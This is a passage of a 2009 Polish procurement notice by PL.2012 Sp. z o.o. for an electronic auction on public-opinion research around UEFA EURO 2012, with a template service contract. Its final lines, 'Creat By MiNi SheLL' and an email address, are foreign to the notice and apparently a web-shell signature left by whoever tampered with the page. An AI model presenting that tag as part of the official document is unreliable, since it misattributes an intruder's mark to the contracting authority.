<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">Licytacja elektroniczna jest jednoetapowa. Podstawowy czas trwania licytacji elektronicznej wynosić będzie 20 minut.Zamawiający dopuszcza maks. 5 opcjonalnych przedłużeń.Szczegółowy opis na stronie www.2012.org.pl w ogłoszeniu Zamawiającego pkt.6</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 04.03.2009 godzina 10:00, miejsce: PL.2012 Sp. z o.o.,
ul. Wybrzeże Gdyńskie 4, 01-531 Warszawa,
Recepcja V piętro w godz. od 9.00 do 17.00.</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> Licytacja zostanie przeprowadzona dnia: 10.03.2009. Licytacja rozpocznie się o godzinie 10:00..</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> Zamknięcie licytacji elektronicznej następuje w chwili upływu czasu trwania licytacji elektronicznej. Maksymalny czas trwania licytacji elektronicznej: 45 minut. Szczegółowy opis na stronie www.2012.org.pl w ogłoszeniu Zamawiającego pkt.6..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> 6.4.	Zamknięcie licytacji elektronicznej nastąpi w chwili upływu podstawowego czasu trwania licytacji elektronicznej pod warunkiem, że w ciągu ostatnich 3 minut  trwania  licytacji żaden z Wykonawców nie złoży oferty. Jeżeli w ciągu ostatnich 3 minut trwania licytacji elektronicznej zostanie złożona oferta przez któregokolwiek z Wykonawców nastąpi uruchomienie opcjonalnego przedłużenia licytacji elektronicznej. W trakcie licytacji elektronicznej możliwe jest uruchomienie 5 opcjonalnych przedłużeń licytacji elektronicznej. Licytacja elektroniczna kończy się wraz z upływem:
- 20 minuty jeśli w okresie między 17 a 20 minutą nie zostanie złożona nowa oferta
- 25 minuty jeśli w okresie między 22 a 25 minutą nie zostanie złożona nowa oferta
- 30 minuty jeśli w okresie między 27 a 30 minutą nie zostanie złożona nowa oferta
- 35 minuty jeśli w okresie między 32 a 35 minutą nie zostanie złożona nowa oferta
- 40 minuty jeśli w okresie między 37 a 40 minutą nie zostanie złożona nowa oferta
- 45 minuty jeśli w okresie między 42 a 45 minutą zostanie bądź nie zostanie złożona nowa oferta..</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający umieścił ogłoszenie o licytacji wraz z załącznikami na stronie www.2012.org.pl, a także na stronie www.ppp.pwpw.pl. Zamawiający nie wymaga zabezpieczenia należytego wykonania umowy.
W związku z art. 144 ust. 1 ustawy Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach:
a)	Zamawiający zastrzega możliwość zmiany wynagrodzenia za realizację przedmiotu umowy w zakresie realizacji badania, o którym mowa w §1 ust.1 lit. b Umowy, w sytuacji, o której mowa w §1 ust.3 Umowy.

Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą zostanie podpisana umowa, której wzór przedstawiono poniżej.

UMOWA

zawarta w dniu _________ roku, w Warszawie
pomiędzy:
PL.2012 Sp. z o.o. z siedzibą w Warszawie przy ul. Wybrzeże Gdyńskie 4, 01-531 Warszawa, kapitał zakładowy 2.000 000,00 złotych, zarejestrowana przez Sąd Rejonowy dla m. st. Warszawy XII Wydział Gospodarczy, nr KRS 0000293205, NIP 701-009-57-15, REGON 141171910,  reprezentowaną przez:
1_________________________________________;
2. ________________________________________;
zwaną w  treści umowy Zamawiającym 

a

____________________________________________
zwanym dalej Wykonawcą

Niniejsza umowa zostaje zawarta na podstawie przyjętej przez Zamawiającego, w postępowaniu o udzielenie zamówienia publicznego w trybie art. 74 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień  publicznych  (tekst  jednolity  Dz.  U.  z  2007  nr  223,  poz.  1655 z późn. zm.  ), oferty z dnia ______________ roku.


Definicje
Dla potrzeb Umowy Strony przyjmują, że wyrazy pisane z dużej litery będą miały znaczenie nadane im definicjami zawartymi w Umowie:
Tablice Statystyczne - tablice zawierające rozkłady odpowiedzi na pytania ankiety wraz ze zróżnicowaniami społeczno-demograficznymi (płeć, wiek, wykształcenie, miejsce zamieszkania) , wydruk w 2 kopiach oraz w wersji elektronicznej ( płyty CD).
Raport - raport w języku polskim, wydruk w kolorze w 2 kopiach oraz w wersji elektronicznej (płyty CD). Raport opracowany w Power Point zawiera notę metodologiczną wraz z opisem i harmonogramem badania, analizę wyników ze szczególnym uwzględnieniem zróżnicowań społeczno-demograficznych , wnioski i rekomendacje. 
Prezentacja - prezentacja w języku polskim, opracowana w Power Point, wydruk w kolorze w 2 kopiach oraz w wersji elektronicznej ( płyty CD) .  Zawiera omówienie  najważniejszych wyników badania ze szczególnym uwzględnieniem zróżnicowań społeczno-demograficznych , wnioski i rekomendacje.
§ 1 Przedmiot umowy
1.	 Zamawiający zleca, a Wykonawca przyjmuje do wykonania usługę realizacji następujących badań:
a.	Ogólnopolski monitoring nastrojów społecznych Wokół UEFA EURO 2012;
b.	Regionalny monitoring nastrojów społecznych Wokół UEFA EURO 2012;
c.	Badanie wizerunku przygotowań do UEFA EURO 2012 ;
d.	Badanie strony internetowej PL.2012 oraz ankieta pop-up wśród internautów; 
zwanych dalej Badaniami;
2.	Szczegółowy opis przedmiotu umowy został określony w Załączniku nr 1 do Umowy.
3.	Zamawiający zastrzega, że zakres przedmiotowy badania, o którym mowa w ust.1 b może ulec zmianie w sytuacji, gdy organizacja UEFA przed terminem jego realizacji zmniejszy liczbę miast - gospodarzy turnieju finałowego UEFA 2012  w Polsce. 
4.	Wykonawca oświadcza, że posiada odpowiedni potencjał do realizacji Badań określonych w ust. 1.
5.	Wykonawca zobowiązuje się do wykonania prac będących przedmiotem umowy z należytą starannością i w zgodzie z aktualnym poziomem wiedzy i obowiązującymi standardami przy tego rodzaju badaniach, wykorzystując w tym celu wszystkie posiadane możliwości, a także będzie chronić interesy Zamawiającego w zakresie powierzonych sobie czynności.
6.	Wykonawca oświadcza, że badania przeprowadzone zostaną z zachowaniem norm wynikających z Ustawy o ochronie danych osobowych, Kodeksu ESOMAR.
7.	Wykonawca ma prawo powierzyć wykonywanie umowy osobom trzecim przy zachowaniu warunków wykonania badań wynikających z niniejszej umowy.
8.	Komunikowanie przez Wykonawcę w celach promocyjnych, faktu współpracy z Zamawiającym m.in. poprzez umieszczenie jego nazwy w swoich materiałach promocyjnych może nastąpić po zakończeniu badań i za zgodą Zamawiającego wyrażoną na piśmie pod rygorem nieważności.
§ 2 Zakres przedmiotu umowy
Badania, o których mowa w § 1 zostaną zrealizowane zgodnie ze szczegółowym opisem przedmiotu zamówienia zawartym w Załączniku nr 1 do Umowy.
§ 3 Termin realizacji przedmiotu umowy
1.	Przygotowanie badań, o których mowa w §1 ust.1 lit. a niniejszej Umowy  nastąpi w następujących terminach:
 - w I kwartale - w terminie od _______r. do ______ r.;
-  w II kwartale - w terminie od ________r. do ______ r.;
- w III kwartale - w terminie od _________r. do ______ r.;
- w  IV kwartale - w terminie od _________r. do ______ r.;
2.	2.  Realizacja badań, o których mowa w §1 ust.1 lit. a niniejszej Umowy odbędzie się w następujących terminach: 
- w I kwartale - do dnia ______ r. i nie będzie trwała dłużej niż ___ dni;
- w II kwartale - do dnia ______ r. i nie będzie trwała dłużej niż ___ dni;
- w III kwartale - do dnia ______ r. i nie będzie trwała dłużej niż ___ dni;
- w IV kwartale - do dnia ______ r. i nie będzie trwała dłużej niż___ dni;
3. Analiza wyników badań i przygotowanie Raportu z badań, o których mowa w §1 ust.1 lit. a niniejszej Umowy  odbędzie się:
- w I kwartale - w dniach od ___ do dnia  ______ r., przy czym prezentacja wyników badania odbędzie się najpóźniej do ________ ______ r.;
- w II kwartale - w dniach od ______ do dnia ______ ______ r., przy czym prezentacja wyników badania odbędzie się najpóźniej do _______ ______ r.;
- w III kwartale - w dniach od ______ do dnia _______ ______ r., przy czym prezentacja wyników badania odbędzie się najpóźniej do _______ ______ r.;
- w IV kwartale - w dniach od ______ do dnia ______ ______ r., przy czym prezentacja wyników badania odbędzie się najpóźniej do ______ ______ r.;
4. Terminy przygotowania, realizacji oraz analizy wyników i przygotowania Raportu z poszczególnych pozostałych badań, o których mowa w §1 ust.1 lit. b-d niniejszej Umowy zostaną określone w szczegółowym harmonogramie badań, przyjętym przez strony w trybie określonym w §4 niniejszej Umowy, z uwzględnieniem terminów wskazanych w załączniku nr 1 do niniejszej Umowy.
5. Określone w niniejszej umowie terminy, mogą ulec zmianie w przypadku wystąpienia siły wyższej lub ustalenia przez Strony innych terminów lub, jeżeli zwłoka lub opóźnienie nastąpiły na skutek okoliczności, za które Wykonawca nie odpowiada. 
6. W przypadku opóźnienia lub zwłoki Zamawiającego terminy ulegają wydłużeniu automatycznie, co najmniej o czas opóźnienia lub zwłoki Zamawiającego w wykonaniu ciążących na nim obowiązków, w szczególności w przypadku niedostarczenia w terminie informacji i materiałów koniecznych lub potrzebnych Wykonawcy do wykonywania umowy, przekroczenia trybu lub terminów określonych na podejmowanie decyzji.
7. Zmiany terminów na zasadzie jak w ust. 1 - 4 nie stanowią zmiany umowy, lecz wymagają uprzedniego ustalenia między stronami w trybie opisanym w §4 niniejszej Umowy.
§ 4 Współdziałanie Zamawiającego 
1.	Zamawiający zobowiązuje się, ilekroć okaże się to konieczne lub potrzebne, do współdziałania z Wykonawcą na prośbę Wykonawcy, w szczególności poprzez udzielanie informacji, wyjaśnień lub odbywanie konsultacji lub udostępnianie dokumentów, danych, zestawień danych lub innych materiałów - w zakresie koniecznym lub potrzebnym do wykonywania umowy.
2.	Wykonawca zobowiązuje się dokonywać z Zamawiającym wszelkich koniecznych ustaleń mogących mieć wpływ na efekt końcowy przedmiotu umowy.
3.	Wykonawca przygotuje ostateczną wersję materiałów niezbędnych do przeprowadzenia każdego poszczególnego Badania we współpracy z Zamawiającym.
4.	Każda ze Stron niniejszej Umowy wyznacza swych upoważnionych przedstawicieli do podejmowania decyzji niezbędnych do wykonywania niniejszej Umowy, składania oświadczeń jak w § 6, oraz odpowiedzialnych za współdziałanie. 
Ze strony Wykonawcy osobą wyznaczoną jest: __________________, lub inna wskazana przez Wykonawcę osoba.
Ze strony Zamawiającego osobą wyznaczoną jest Beata Jaworska lub inna osoba wskazana przez Zamawiającego
Wszelkie zmiany w zakresie osób wyznaczonych do wzajemnych kontaktów wymagają natychmiastowego powiadomienia o tym fakcie drugiej Strony. Zmiany takie nie będą stanowić zmiany Umowy.
§ 5 Zachowanie tajemnicy
1.	Wykonawca zobowiązuje się do zachowania w tajemnicy wyników przeprowadzonych badań, jak również wszelkich informacji i materiałów przekazanych mu przez Zamawiającego w związku z prowadzonymi Badaniami. Wykonawca nie może w jakiejkolwiek formie udostępniać całości lub części wyników na rzecz osób trzecich bez zgody Zamawiającego.
2.	Zamawiający zobowiązuje się do zachowania w tajemnicy wszelkich przedmiotów praw wyłącznych lub bezwzględnych, tajemnic przedsiębiorstwa lub innych, informacji i materiałów przekazanych mu przez Wykonawcę lub z którymi mógł się zapoznać w związku z prowadzonymi Badaniami, do których prawa przysługują Wykonawcy lub osobom trzecim lub które pozostają w dyspozycji Wykonawcy lub osób trzecich, co obejmuje także dotyczące ich idee, pomysły, koncepcje, założenia, zasady działania, zastosowania lub korzystania, projekty, specyfikacje lub inne informacje, dokumenty, narzędzia lub inne materiały. Zamawiający nie może w jakiejkolwiek formie udostępniać całości lub części ww. przedmiotów, tajemnic, informacji i materiałów na rzecz osób trzecich bez zgody Wykonawcy.
3.	Postanowienia powyższe obowiązują również przez okres 5 lat od dnia ustania niniejszej umowy.
4.	Postanowienia powyższe nie dotyczą następujących przypadków:
a.	udostępniania ww. przedmiotów, tajemnic, informacji i materiałów w związku z wykonywaniem obowiązków wynikających z przepisów prawa, orzeczeń właściwych władz lub uprawnień i obowiązków Stron związanych z ochroną, obroną, zabezpieczeniem lub dochodzeniem swoich praw lub interesów na drodze sądowej lub pozasądowej,
b.	udostępnienia ww. przedmiotów, tajemnic, informacji i materiałów osobom, z pomocy których Strona korzysta w związku z wykonywaniem umowy lub którym wykonywanie umowy powierza pod warunkiem zobowiązania ich do zachowania tych informacji w tajemnicy,
c.	ustania stanu tajemnicy na skutek działań Strony uprawnionej, polegających na przekazaniu tajemnicy do publicznej wiadomości.
§ 6 Przekazanie i przyjęcie, rozpowszechnianie wyników
1. Wyniki każdego poszczególnego badania powinny zostać przekazane Zamawiającemu w formie Tablic Statystycznych (dot. badań określonych w §1 ust.1 lit. a i b  niniejszej Umowy) i Raportu (dot. badań określonych w §1 ust.1 lit. a-d niniejszej Umowy). Ustna Prezentacja wyników odbędzie się w siedzibie Zamawiającego zgodnie z terminami wskazanymi w §3 ust.3 niniejszej Umowy lub harmonogramie, o którym mowa w §3 ust.4 niniejszej Umowy z uwzględnieniem terminów zawartych w Załączniku nr 1 do Umowy.
2. W terminie 7 dni od dnia udostępnienia wyników każdego poszczególnego Badania (w tym Raportu z Badania) Zamawiający oświadczy Wykonawcy, czy wyniki Badania (w tym Raport Badania) przyjmuje, czy przyjmuje je z zastrzeżeniem dokonania poprawek i uzupełnień wskazując je szczegółowo, czy wyników Badania (i w tym Raportu z Badania) nie przyjmuje. Brak oświadczenia Zamawiającego w powyższym terminie uważa się za przyjęcie wyników Badania (w tym Raportu z Badania).
3. Na wykonanie ewentualnych poprawek i uzupełnień przysługuje Wykonawcy dodatkowy termin nieprzekraczający 14 dni, liczony od momentu pisemnego zgłoszenia zastrzeżeń.
4. Oświadczenie, o którym mowa w ust. 2 może być dokonane za pośrednictwem poczty elektronicznej.
5. Jeśli wyniki określonego Badania (w tym Raport z Badania) przeznaczone są do rozpowszechniania, w szczególności publikacji lub innego udostępnienia, Zamawiający poinformuje Wykonawcę o tym zamiarze przed zakończeniem Badania. 
6. Wykonawca nie ponosi odpowiedzialności za interpretację wyników poszczególnych Badań (w tym Raportu z Badania) oraz wnioski dokonane przez Zamawiającego. W takim zakresie Zamawiający gwarantuje, że będzie odpowiadał za wszelkie roszczenia osób trzecich, które mogą zgłosić się do Wykonawcy z zarzutem nieprawdziwej, wprowadzającej w błąd lub w inny sposób nieprawidłowej interpretacji czy wykorzystania danych, wyników lub wniosków.
§ 7 Prawa majątkowe
1.	Z zastrzeżeniem ust. 2 i 3 wszelkie prawa wyłączne lub bezwzględne, podmiotowe, a także prawa do faktycznej dyspozycji do przedmiotów tych praw wykorzystanych przez Wykonawcę lub stworzonych siłami Wykonawcy lub na jego zamówienie - w związku z czynnościami dokonanymi przed zawarciem niniejszej umowy, w związku z jej zawieraniem lub wykonywaniem lub przy tej okazji przysługują Wykonawcy bez ograniczeń i nie przechodzą na Zamawiającego. W szczególności dotyczy to utworów, projektów wynalazczych lub racjonalizatorskich, innych rozwiązań technicznych, baz danych, znaków towarowych lub innych oznaczeń, wzorów przemysłowych lub użytkowych, a także idei, pomysłów, koncepcji, założeń, ofert, prezentacji, specyfikacji, instrukcji, metod, technik lub innych sposobów działania, narzędzi lub innych materiałów badawczych, tajemnic (w tym know-how), programów komputerowych.
2.	Z zastrzeżeniem bezwzględnie obowiązujących przepisów prawa Wykonawca zobowiązuje się przenieść na Zamawiającego przysługujące Wykonawcy prawa wyłączne lub bezwzględne do wyników wszystkich Badań (w tym, narzędzi badawczych - pytań kwestionariuszy i każdego Raportu z Badania) opisanych w § 6 ust. 1 w zakresie ich utrwalania i zwielokrotniania oraz rozpowszechniania, a jeżeli takie wyniki określonego Badania przekazywane są Zamawiającemu w postaci bazy danych wyłączne prawa do takiej bazy danych zawierającej wyniki Badania. Skutek rozporządzający następuje na podstawie niniejszego postanowienia i z dniem przyjęcia bez zastrzeżeń wyników (w tym z Raportu z Badania) przez Zamawiającego.  
3.	Jeżeli wyniki określonego Badania (w tym Raport z Badania) opisane w § 6 ust. 1 nie będą przedmiotem praw wyłącznych lub bezwzględnych, Zamawiającemu służyć będzie prawo do faktycznej dyspozycji tymi wynikami jako tajemnicy przedsiębiorstwa Zamawiającego z dniem, o którym mowa w ust. 2 zdanie ostatnie.
4.	Własność przedmiotów lub innych nośników zapisu, na których utrwalono wyniki każdego poszczególnego Badania (w tym Raport z Badania) przechodzi na Zamawiającego z dniem nastąpienia skutku rozporządzającego, o którym mowa w ust. 2 i/lub 3.
5.	Wykonawca zachowa dane i materiały z poszczególnych Badań (np. Raporty, kwestionariusze, bazy danych, kasety audio/wideo, materiały instruktażowe, listy kodowe, itp.), zapisane w wersji elektronicznej bądź w inny sposób, przez okres 24 miesięcy po zakończeniu każdego Badania. Po upływie tego okresu, wszelkie dane lub materiały mogą zostać zniszczone przez Wykonawcę bez zawiadamiania lub zgody Zamawiającego.
§ 8 Wynagrodzenie
1.	Wysokość wynagrodzenia za wykonanie poszczególnych badań, o których mowa w §1 ust.1 Umowy wynosi:
- za badanie określone w §1 ust.1 lit. a Umowy - łącznie ___________ zł brutto (słownie: ___________________________________zł);
- za badanie określone w §1 ust.1 lit. b Umowy - _____________ zł (słownie: ___________________________________ zł) brutto;
- za badanie określone w §1 ust.1 lit c Umowy - ______________ zł (słownie: ___________________________________ zł) brutto;
- za badanie określone w §1 ust.1 lit. d Umowy w zakresie dot. badania strony internetowej PL.2012 - _______________ zł (słownie:  ___________________________________zł) brutto;
- za badanie określone w §1 ust.1 lit. d Umowy w zakresie dot. ankiety pop-up wśród internautów - ________________zł (słownie: __________________________________ zł) brutto.
2.	Wysokość wynagrodzenia Wykonawcy za wszystkie czynności będące przedmiotem niniejszej Umowy, o których mowa w ust.1 niniejszego paragrafu, wynosi łącznie_____________ PLN brutto (słownie: ____________________________________ złotych brutto) (kwota brutto = kwota netto + VAT), z zastrzeżeniem ustępu 7 i 8. Wynagrodzenie netto zostanie powiększone o podatek VAT, zgodnie z obowiązującymi przepisami. 
3.	Wynagrodzenie, o którym mowa w ust. 1 i 2 obejmuje również wynagrodzenie za przeniesienie praw wyłącznych, o których mowa w § 7 ust. 2 niniejszej Umowy, prawa, o którym mowa w §7 ust.3 niniejszej Umowy oraz wszelkich nośników zapisu, o których mowa w §7 ust.4 niniejszej Umowy objętych wynagrodzeniem umownym.
4.	 Faktury VAT za poszczególne badania, o których mowa w ust.1, będą wystawiane w sposób następujący: faktura - nie później niż w ciągu 7 dni po wykonaniu badania i przyjęciu Raportu przez Zamawiającego bez zastrzeżeń.
5.	Zamawiający przeleje należne Wykonawcy kwoty wynagrodzenia na konto Wykonawcy nr. _______________________________ w terminie 14 dni od dnia wystawienia poszczególnej faktury przez Wykonawcę. Fakturę wysłaną Zamawiającemu na adres do doręczeń wskazany w umowie, a nie odebraną przez Zamawiającego uważa się za doręczoną po upływie 14 dni od dnia wysłania.
6.	Fakturę VAT należy wystawić na: PL.2012 Sp. z o.o. ul. Wybrzeże Gdyńskie 4, 01-531 Warszawa; NIP: 701-009-57-15.
7.	Zamawiający zastrzega możliwość zmiany wynagrodzenia za realizację przedmiotu umowy w zakresie realizacji badania, o którym mowa w §1 ust.1 lit. b Umowy, w sytuacji, o której mowa w §1 ust.3 Umowy. 
8.	W przypadku, o którym mowa w ust. 7 wynagrodzenie należne Wykonawcy za realizację badania wymienionego w §1 ust.1 lit. b Umowy zostanie pomniejszone o:
a.  13% gdy lista miast - gospodarzy turnieju finałowego UEFA 2012  w Polsce ogłoszona przez organizację UEFA będzie liczyła 5 miast;
b.  27% gdy lista miast - gospodarzy turnieju finałowego UEFA 2012  w Polsce ogłoszona przez organizację UEFA będzie liczyła 4 miasta;
c.  40% gdy lista miast - gospodarzy turnieju finałowego UEFA 2012  w Polsce ogłoszona przez organizację UEFA będzie liczyła 3 miasta.

§ 9 Kary umowne i odstąpienie od umowy
1.	W przypadku nienależytego wykonania zamówienia, w tym zrealizowania go niezgodnie z warunkami zawartymi w ogłoszeniu o licytacji elektronicznej Zamawiający może wyznaczyć Wykonawcy dodatkowy termin realizacji określonego badania, wskazując jednocześnie na uchybienia, które Wykonawca powinien usunąć, a po jego bezskutecznym upływie Zamawiający jest uprawniony do odstąpienia od tej części umowy lub umowy w zakresie świadczeń jeszcze nie wykonanych, bez wynagrodzenia, oraz jest uprawniony do obciążenia Wykonawcy karą umowną w wysokości 20% wynagrodzenia brutto określonego zgodnie  z § 8 ust.1 odnoszącego się do określonego badania lub żądania obniżenia wynagrodzenia.
2.	W przypadku nie wykonania przez Wykonawcę określonej części zamówienia w ustalonym terminie Zamawiający potrąci, z wynagrodzenia Wykonawcy określonego w §8 ust. 1 karę umowną w wysokości 0,5% kwoty brutto tego wynagrodzenia za określone badanie za każdy dzień opóźnienia z zastrzeżeniem ust. 3.
3.	W przypadku opóźnienia wykonania określonego świadczenia przez Wykonawcę dłuższego niż 7 dni, Zamawiający zastrzega sobie prawo odstąpienia od tej części umowy lub umowy w zakresie świadczeń jeszcze nie wykonanych, bez wynagrodzenia, a Wykonawca zapłaci karę umowną w wysokości 20% wynagrodzenia brutto określonego w §8 ust.1 za dane świadczenie.
4.	Zapłata kar umownych przewidzianych w niniejszej umowie nie pozbawia Zamawiającego prawa do dochodzenia na zasadach ogólnych odszkodowania przenoszącego wysokość zastrzeżonej kary umownej.
5.	Kary umowne określone w ust. 1, ust. 2 , ust. 3 mają zastosowanie jedynie w przypadku opóźnienia z przyczyn leżących po stronie Wykonawcy.
6.	Wykonawca nie ponosi odpowiedzialności za opóźnienia wynikające z winy Zamawiającego oraz sił wyższych. W przypadku zagrożenia wystąpienia opóźnienia realizacji zlecenia z powodu siły wyższej Wykonawca poinformuje Zamawiającego możliwie jak najszybciej o zaistnieniu takiej sytuacji.
7.	W przypadku nie dokonania przez Wykonawcę Prezentacji wyników określonego badania w terminie wskazanym w §3 ust.3 niniejszej Umowy lub harmonogramie, o którym mowa w §3 ust.4 niniejszej Umowy z uwzględnieniem terminów zawartych w Załączniku nr 1 do Umowy Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 5% wynagrodzenia brutto określonego w §8 ust.1 za określone badanie.
§ 10 Postanowienia końcowe
1.	Strony ustalają następujące adresy do doręczeń ze skutkiem prawnym:
1)Wykonawca: ____________________________;
       2) Zamawiający: PL.2012 Sp. z o.o. ul. Wybrzeże Gdyńskie 4, 01-531 Warszawa;
oraz zobowiązują się do niezwłocznego pisemnego zawiadamiania się o zmianie adresu do doręczeń pod rygorem skutecznego doręczenia na ostatni wskazany adres do doręczeń.
2.	Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej w postaci aneksu, podpisanego przez obie strony, pod rygorem nieważności.
3.	W sprawach nieuregulowanych umową zastosowanie mają przepisy kodeksu cywilnego.
4.	Załączniki wymienione w niniejszej umowie, stanowią jej integralną część.
5.	Umowa została spisana w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze stron.
Załączniki do umowy:
Załącznik nr 1 - Szczegółowy opis przedmiotu zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com